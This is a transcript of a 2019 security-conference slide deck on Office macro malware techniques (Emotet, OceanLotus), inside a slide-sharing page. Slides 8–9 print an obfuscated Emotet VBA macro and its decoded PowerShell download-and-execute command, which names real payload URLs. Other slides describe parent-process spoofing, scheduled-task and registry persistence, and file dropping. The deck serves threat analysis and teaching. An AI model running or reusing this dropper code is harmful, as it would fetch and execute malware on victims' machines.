Sbc 2020 bao gio vn co anm dua vao cong nghe moSecurity Bootcamp
 
Giam sat thu dong thong tin an toan hang hai su dung sdr
Giam sat thu dong thong tin an toan hang hai su dung sdrGiam sat thu dong thong tin an toan hang hai su dung sdr
Giam sat thu dong thong tin an toan hang hai su dung sdrSecurity Bootcamp
 
Insider threat-what-us-do d-want
Insider threat-what-us-do d-wantInsider threat-what-us-do d-want
Insider threat-what-us-do d-wantSecurity Bootcamp
 
Malware detection-using-machine-learning
Malware detection-using-machine-learningMalware detection-using-machine-learning
Malware detection-using-machine-learningSecurity Bootcamp
 
Tim dieu moi trong nhung dieu cu
Tim dieu moi trong nhung dieu cuTim dieu moi trong nhung dieu cu
Tim dieu moi trong nhung dieu cuSecurity Bootcamp
 
Threat detection with 0 cost
Threat detection with 0 costThreat detection with 0 cost
Threat detection with 0 costSecurity Bootcamp
 
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active Directory
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active DirectoryGOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active Directory
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active DirectorySecurity Bootcamp
 
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018Security Bootcamp
 
Lannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber AttacksLannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber AttacksSecurity Bootcamp
 
Letrungnghia-gopyluananm2018
Letrungnghia-gopyluananm2018Letrungnghia-gopyluananm2018
Letrungnghia-gopyluananm2018Security Bootcamp
 
Cyber Attacks on Financial _ Vikjava
Cyber Attacks on Financial _ VikjavaCyber Attacks on Financial _ Vikjava
Cyber Attacks on Financial _ VikjavaSecurity Bootcamp
 

More from Security Bootcamp (20)

Ransomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdfRansomware is Knocking your Door_Final.pdf
Ransomware is Knocking your Door_Final.pdf
 
Hieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecurityHieupc-The role of psychology in enhancing cybersecurity
Hieupc-The role of psychology in enhancing cybersecurity
 
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s viewNguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
Nguyen Huu Trung - Building a web vulnerability scanner - From a hacker’s view
 
Sbc 2020 bao gio vn co anm dua vao cong nghe mo
Sbc 2020 bao gio vn co anm dua vao cong nghe moSbc 2020 bao gio vn co anm dua vao cong nghe mo
Sbc 2020 bao gio vn co anm dua vao cong nghe mo
 
Deception change-the-game
Deception change-the-gameDeception change-the-game
Deception change-the-game
 
Giam sat thu dong thong tin an toan hang hai su dung sdr
Giam sat thu dong thong tin an toan hang hai su dung sdrGiam sat thu dong thong tin an toan hang hai su dung sdr
Giam sat thu dong thong tin an toan hang hai su dung sdr
 
Sbc2019 luong-cyber startup
Sbc2019 luong-cyber startupSbc2019 luong-cyber startup
Sbc2019 luong-cyber startup
 
Insider threat-what-us-do d-want
Insider threat-what-us-do d-wantInsider threat-what-us-do d-want
Insider threat-what-us-do d-want
 
Malware detection-using-machine-learning
Malware detection-using-machine-learningMalware detection-using-machine-learning
Malware detection-using-machine-learning
 
Tim dieu moi trong nhung dieu cu
Tim dieu moi trong nhung dieu cuTim dieu moi trong nhung dieu cu
Tim dieu moi trong nhung dieu cu
 
Threat detection with 0 cost
Threat detection with 0 costThreat detection with 0 cost
Threat detection with 0 cost
 
Build SOC
Build SOC Build SOC
Build SOC
 
AD red vs blue
AD red vs blueAD red vs blue
AD red vs blue
 
Securitybox
SecurityboxSecuritybox
Securitybox
 
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active Directory
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active DirectoryGOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active Directory
GOLDEN TICKET - Hiểm hoa tiềm ẩn trong hệ thống Active Directory
 
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
PHÂN TÍCH MỘT SỐ CUỘC TẤN CÔNG APT ĐIỂN HÌNH NHẮM VÀO VIỆT NAM 2017-2018
 
Api security-present
Api security-presentApi security-present
Api security-present
 
Lannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber AttacksLannguyen-Detecting Cyber Attacks
Lannguyen-Detecting Cyber Attacks
 
Letrungnghia-gopyluananm2018
Letrungnghia-gopyluananm2018Letrungnghia-gopyluananm2018
Letrungnghia-gopyluananm2018
 
Cyber Attacks on Financial _ Vikjava
Cyber Attacks on Financial _ VikjavaCyber Attacks on Financial _ Vikjava
Cyber Attacks on Financial _ Vikjava
 

Recently uploaded

WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfjimielynbastida
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Neo4j
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Patryk Bandurski
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 

Recently uploaded (20)

E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdf
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024Build your next Gen AI Breakthrough - April 2024
Build your next Gen AI Breakthrough - April 2024
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 

Macro malware common techniques - public

  • 1. Macro malware – Common Techniques <m4n0w4r> 9/16/2019 Macro malware - common techniques 1
  • 2. #Wh0_4m_1? 1. @kienmanowar/@m4n0w4r 2. Twitter: @kienbigmummy 3. Company: 4. Blog: kienmanowar.wordpress.com 5. Writer for tradahacking.vn 9/16/2019 Macro malware - common techniques 2
  • 3. Agenda • Typical Method • Evading Parent/Child Analysis • Scheduled Task Creation • Registry Modification • Dropping Files • Download File 9/16/2019 Macro malware - common techniques 3
  • 4. Cyber Kill Chain Model by Lockheed Martin (Intelligence-Driven Computer Network Defense) 9/16/2019 Macro malware - common techniques 4
  • 5. The Typical Method 9/16/2019 Macro malware - common techniques 5
  • 6. Emotet variant 9/16/2019 Macro malware - common techniques 6 https://www.virustotal.com/gui/file/fdd6288747eb976a863966935b7800b1ed839ded3fe15dfa039a2c6f68b940b
  • 7. VBA code 9/16/2019 Macro malware - common techniques 7
  • 8. Code from VBA Modules VBA.Shell$ iphSIiNfaNjTt, 0 Function iphSIiNfaNjTt() iphSIiNfaNjTt = aPNnoXoRGKMH + TiaBlsUalNnM + Chr(34) + PDmnv + RswVlbiC + vColwfOi + OzfjstduXoj + zBYLwoLni + pnThlsfRP + Gfccqau + LQjdFQhEO + JstYsN + sDwChEYslpP + zDTGrVwpTAR + mitjmD + ciSOwmuuE + WEPLobW + vqfEdabPIV + vJOMi + UXiBTISI + dfhFU + nwoRcLWNZSV + NCMSjazF + RjwDOIFiGzs + ohQcC + RlVzAwiHW + RifikIkmi + FCRNXlL Function aPNnoXoRGKMH() aPNnoXoRGKMH = zilMH + pcrOzYMPXCi + WbDnCzlCK + pDUqAABFGh + lUoibmOjr + KhVOwsl + HDQPmHVYiD + GzWjGEcXiX + ZwlCz + dCjRnjGNz + nlUHZPnE + HEaiojkVdDO + XFjnjbjmqJl + kqjwHUq + piantJ + rbEDwpNc + QzYmE + nrJILEn + ELizU + MqfiQmS + LOokRDhqqN + IalQpFoPE + WarbPVl + MMjcSjVm + iruMBLDcwO + RmkFihGQtT + ArUkXJj + OBwrdhtvBW + LVzEDLjRQ + DjYuFmCTTb + pTfFmQL + cqWwPkKsqz + bICZzvUpr + CrQFN + hDTBAKT + OBMNt + mMIiPM + VVwsdSc + cQYjuhzP + YrjGfpqCsh + LcobGJwo + sTYPbGYDlY + niSmUt + CGnOlwKbSU + cwnETzznnOA + XuaUi Sub AutoOpen() Function TiaBlsUalNnM() TiaBlsUalNnM = TjwZuOEuD + pNnCVwPqc + nJjPqlMU + bUkkvzm + BwpYcYDBvwJ + rwUqquf + HzXlmSLam + QWFwhK + uWzPz + zBMjmZtjcta + mUCjUokNWi + CIEnrYmn + cNibOLwTH + pBaLfCn + EJOFwt + XBTEJrDCU + OCcJVHjp + ZnaGFFBj + tXLGhr + vwOZE + mVOJSknpq + lcObnwwZdL + ANZAwiDb + fbiaJQGX + qPAaHtT + fEfOho + tAIPPEJcL + zmaMGDoLTX + zDHkzGhR + DrWNQJz + uPzAhno + LGziXMAdoL + WVZkI + VipSi + IAjpSiYwj + hnTWVhb + ZOrnliBU 9/16/2019 Macro malware - common techniques 8
  • 9. Decoded VBA call to obfuscated powershell cmd hiouhOI jido fhoiwehipwmdklqwn whqoijpdwdp & %C^om^S^p^Ec% /V /c set %UfcOSmsFlTRZbCd%=vTofQRpIAdE&&set %DJmbfqzcEOAi%=o^we^r^s&&set %FHddmvtrWTDusVN%=AMAaiPp&&set %jjwYoPpzc%=p&&set %iRZHwCqTNohnzHp%=fdiLHLsZvJCQovA&&set %iphSIiNfaNjTt%=^he^l^l&&set %DWqRzMNnzojzpFK%=iPtLhWsXHimrdwt&&!%jjwYoPpzc%!!%DJmbfqzcEOAi%!!%iphSIiNfaNjTt%! "(('((i4T(k9Brk9B+k9BOi4T+i4TNfrank9B+k9Bck9B+k9Bi4T+i4T = new-ok9B'+'+k9Bbjk9B+k9Bect System.k9B+ki4T+i4T9BNetk9B+k9B.Wk9B+k9Be'+'k9B+k9BbClk9B+k9Bien'+'t;rONk9'+'B+k'+'9Bnsk9B+k9Badask9B+k9Bd =k9B+i4T+i4Tk9B new-ok9B+k9Bbjk9B+k9B'+'ect randok9B+k9Bm;ki4T+'+'i4T9i'+'4T+i4TB+k9BrONbk9B+k9Bck'+'9B+k9Bd = Hk9B+k9B1Ihtk9B+k9Btp:k9B+k9B//cok9B+k9i4T+i4TBffeybarn.com/Qq3sk9i4T+i4TB+k9BDS0/,ki4T+i4T9B+k9Bhttpi4T+i4T://e asyfook9B+k9Bd.us/'+'Gk9B+k9B4Vk9B+k9BaoW/k9B'+'+k9B,https://icbk9B+'+'k9Bb.uk9B+k9Bnuk9B+k9Bdk9B+k9B.ac.ik9B+k9 Bdk9B+k9i4T+i4TB'+'/k9B+k9B0XSX0/'+'k9B+k9B,k9B+k9Bhttpki'+'4T+i4T9B+k9B://'+'fk9B+k9Bi4T+i4Testival-dk9B+i 4T+i4Tk9Bruk9B+k9'+'Bzba.'+'ck9B+k9Bom.ua'+'/k9B+k9i4T+i4TBr4Ik9B+k9Bwzk9B+k'+'9B/,http:/k9B+k9B/k9B+ki4T+i4T9Bp lak9B+k9Bn.gotk9B+k9Beborg2021k9B+k9Bi4T+i4T.wek9B'+'+k9Bbadmini4T+i4T8.nek9i4T+i4TB+k9'+'Bt/wpk9B+k9B- i4T+i4Tcok9B+k9Bntent/t'+'hek9B+k9Bmk9B+k9Bek9B+k9Bs/k9B+k9Bgotebk9B'+'+k9Borg/fhYk9B+k9Bmi4T+i4T/H1i4T+i4TI.Spk 9B+k'+'9Bli4T+i4'+'Tit'+'(H1I,H1'+'I);rOk9B+k9B'+'Nkarapas = '+'rk9B+k9BONnsadasd'+'i4T+i4'+'Tk9'+'B+k9B.nk9B+k9Bek9B+k9Bxk9B+k9Btk9B+k9i4T+i4TB'+'(k9B+k9B1, k9B+k9B3k9B+k9B4k9B+k9B3ki4T+i4T9B'+'+k9B24k9B+k9Bi4T+i4T5);rONk9B+k9Bhuas =ki4T+i'+'4T9B+k9B rONenv:puk9B+k9Bblik9B+k9Bi4T+i4Tc + H1k9B'+'+k9B'+'IN5oH1I +k9B+k9B rk9B+k9BOk9B+k9BNkarapi4T+i4Tas + H1I.exeH1k9B+k9BI;forek9B+k9'+'Bach(rOk9B+k9BNab'+'c ii4T+i4Tnk9B+k'+'9B rk9B+k9BONbcd){k9B+k9Btrk9B+k9By{rON'+'f'+'ri4T+i4Tanc.Downloai4T+i4TdFi4T+i4Tile(rk9B+k9BO'+'Nk9B+k9B'+'ai4T+i4 Tbck9'+'B+k'+'9B.Tki4T'+'+i4T9B+k9Bok9i4T+i4TB+k9BString(),i4T+i4T rONhk9B+k9Buki4T+i4T9B+k9Bas);k9B+k9BInvoke- k9B+k9BItem(k9B+k9Br'+'ONhuas)k9B+k9B;k9i4T+i 4TB+k9Bbreak9B+k9Bk;}catch{i4T+i4'+'Twritk9B+k9Bek9B+k9B'+'-k9B+k9Bh'+'k9B+k9Bost rON'+'_.k9B+k9BEk9B+k9Bxcept'+'ion.i4T+i4TMek9B+k9Bssage;}}k9B).rEPlACE(k9BrONk9B,k9BrcWk9B).rEP'+'lACE(([chAR]7 8+[chAR]53+[chAR]111),[Si4T+i4TtrING][chAR]92).rEPlACE(([chi4T+i4TAR]72+[ch'+'AR]49+[chAR]73),[StrING][chAR]39'+ ')GLo& ('+' rcWENv:p'+'uBi4T+i4TLi4T+i4TIC[13]+rcWENv:PuBLIc[5]+k9BXk9B)i4T) - cReplaCe([Char]71+[Char]76+[Char]111'+'),[Char]124 -rEPLaCE([Char]114+[Cha'+'r]99+[Char]87),[Char]36 - cReplaCei4Tk9Bi'+'4T,[Char]39) JYX &( ([STriNg]EzevERboSeprEFErEnCE)[1,3]+i4TXi4T-JoIni4Ti4T)') -rEPlaCe ([ChAr]69+[ChAr]122+[ChAr]101),[ChAr]36 -CrePLace([ChAr]105+[ChAr]52+[ChAr]84),[ChAr]39 -rEPlaCe 'JYX',[ChAr]124) |&( $sheLLid[1]+$ShEllId[13]+'X') 9/16/2019 Macro malware - common techniques 9
  • 10. 9/16/2019 Macro malware - common techniques 10
  • 11. Decoded powershell 9/16/2019 Macro malware - common techniques 11
  • 12. Evading Parent/Child Analysis 9/16/2019 Macro malware - common techniques 12
  • 13. • This behavior is relatively anomalous and can easily be detected by most modern blue-teams. 9/16/2019 Macro malware - common techniques 13
  • 14. Spawning via WmiPrvse.exe using wmi https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks--processes • New process will be spawned under “wmiprvse.exe” instead of the Office process. The code to perform this is below: 9/16/2019 Macro malware - common techniques 14
  • 15. Spawning via ShellCOM • https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ • https://github.com/tyranid/oleviewdotnet (James Forshaw) 9/16/2019 Macro malware - common techniques 15
  • 16. Spawning via ShellCOM • Sample code using ShellBrowserWindow : https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects-part-two.html 9/16/2019 Macro malware - common techniques 16
  • 17. Spawning via ShellCOM • Sample code using ShellWindows : 9/16/2019 Macro malware - common techniques 17
  • 18. Parent PID Spoofing with CreateProcessA • The API call CreateProcessA supports a parameter called “lpStartupInfo” where you can essentially define the parent process you want to use. – lpStartupInfo parameter points to a STARTUPINFOEX structure 9/16/2019 Macro malware - common techniques 18
  • 19. Sample in the wild https://www.virustotal.com/gui/file/fd92d069a3e544a9b77d78216e050a03197e4fa39b40f4965fced5230f31b89e/ 9/16/2019 Macro malware - common techniques 19
  • 20. 1st stage VBA Code 9/16/2019 Macro malware - common techniques 20
  • 21. Decoded base64 String 9/16/2019 Macro malware - common techniques 21
  • 22. 2nd VBA code (1) 9/16/2019 Macro malware - common techniques 22
  • 23. dllhost.exe run as child of explorer.exe 9/16/2019 Macro malware - common techniques 23
  • 24. 2nd VBA code (2) 9/16/2019 Macro malware - common techniques 24
  • 25. Scheduled Task Creation 9/16/2019 Macro malware - common techniques 25
  • 26. • VBScript supports us create Scheduled Tasks, which can be abused to not only related to activity from Office (svchost.exe will spawn the task). – Ref: https://docs.microsoft.com/en-gb/windows/win32/taskschd/time-trigger- example--scripting- 9/16/2019 Macro malware - common techniques 26
  • 27. Sample in the wild https://www.virustotal.com/gui/file/9ea577a4b3faaf04a3bddbfcb934c9752bed0d0fc579f2152751c5f6923f7e14 9/16/2019 Macro malware - common techniques 27
  • 28. Extract out the VBA Macro code 9/16/2019 Macro malware - common techniques 28
  • 29. Sub Document_Open() 9/16/2019 Macro malware - common techniques 29
  • 30. Sub Document_Close() 9/16/2019 Macro malware - common techniques 30
  • 31. A sample of APT32 (aka OceanLotus) https://www.virustotal.com/gui/file/1fc1bc4d004ab51398070d8e3025fecf8878229cda8befdbc9a2faf592b8d876 9/16/2019 Macro malware - common techniques 31
  • 32. 9/16/2019 Macro malware - common techniques 32
  • 33. 9/16/2019 Macro malware - common techniques 33
  • 34. 9/16/2019 Macro malware - common techniques 34
  • 35. 9/16/2019 Macro malware - common techniques 35
  • 36. Registry Modification 9/16/2019 Macro malware - common techniques 36
  • 37. • VBScript also allows access to the registry - allowing the storing of payloads, modification of settings, and creation of persistence entries directly from a macro (using WMI or WScript) – Ref: https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-tasks-- registry 9/16/2019 Macro malware - common techniques 37
  • 38. Wild wild west https://www.virustotal.com/gui/file/707d2128a0c326626adef0d3a4cab78562abd82c2bd8ede8cc82f86c01f1e0249/16/2019 Macro malware - common techniques 38 https://www.virustotal.com/gui/file/707d2128a0c326626adef0d3a4cab78562abd82c2bd8ede8cc82f86c01f1e024
  • 39. Extract out the VBA Macro code 9/16/2019 Macro malware - common techniques 39
  • 40. 9/16/2019 Macro malware - common techniques 40
  • 41. Write 1st decoded base64 to "C:ProgramDataWindowsDefender.ini" 9/16/2019 Macro malware - common techniques 45
  • 42. Write 2nd decoded base64 to "C:ProgramDataDefender.sct" 9/16/2019 Macro malware - common techniques 46
  • 43. Write 3rd decoded base64 to "C:ProgramDataDefenderService.inf" 9/16/2019 Macro malware - common techniques 47
  • 44. LoL_Bin (Living Off The Land) 9/16/2019 Macro malware - common techniques 48
  • 45. 9/16/2019 Macro malware - common techniques 49
  • 46. Another #OceanLotus sample 9/16/2019 Macro malware - common techniques 50 https://www.virustotal.com/gui/file/9f59c397d1346f2707fc7b54fe6cb4622770accf94eb4394514d2bf167d65007
  • 47. VBA code 9/16/2019 Macro malware - common techniques 51
  • 48. Dropping Files 9/16/2019 Macro malware - common techniques 52
  • 49. • Dropping files has its pros and cons. Making changes to disk can often mean payloads are analyzed by antivirus and leave forensic artefacts. Yet in most breaches attackers still use payloads dropped to disk due to the convenience and ease of having a solid foothold in a network. • In VBScript we can make use of the FileSystemObject to drop files. 9/16/2019 Macro malware - common techniques 53
  • 50. Again another sample of #OceanLotus…. 9/16/2019 Macro malware - common techniques 54 https://www.virustotal.com/gui/file/a4a066341b4172d2cb752de4b938bf678ceb627ecb72594730b78bd05a2fad9d
  • 51. VBA code… 9/16/2019 Macro malware - common techniques 55
  • 52. Dropping dll file 9/16/2019 Macro malware - common techniques 56
  • 53. Another sample https://www.virustotal.com/gui/file/cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7 9/16/2019 Macro malware - common techniques 57 https://www.virustotal.com/gui/file/cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7
  • 54. VBA Code – Get Base64 data 9/16/2019 Macro malware - common techniques 58
  • 55. VBA Code – Decode b64 and execute payload 9/16/2019 Macro malware - common techniques 59
  • 56. Download file 9/16/2019 Macro malware - common techniques 60
  • 57. • There are multiple ways VBScript can be used to download content. This content can then be dropped to disk, inserted into the registry or injected into memory. • One of the most common and simplest methods is using the XMLHTTP library along with ADODB to output to file. • Another option would be to use a direct API call, for example a simple VBScript download cradle can be implemented using URLDownloadToFileA. 9/16/2019 Macro malware - common techniques 61
  • 58. Some sample code 9/16/2019 Macro malware - common techniques 62
  • 60. Extract out VBA code 9/16/2019 Macro malware - common techniques 64
  • 61. Extract out VBA code 9/16/2019 Macro malware - common techniques 65
  • 62. 9/16/2019 Macro malware - common techniques 66
  • 64. VBA Code 9/16/2019 Macro malware - common techniques 68
  • 65. 9/16/2019 Macro malware - common techniques 69
  • 66. End! 9/16/2019 Macro malware - common techniques 70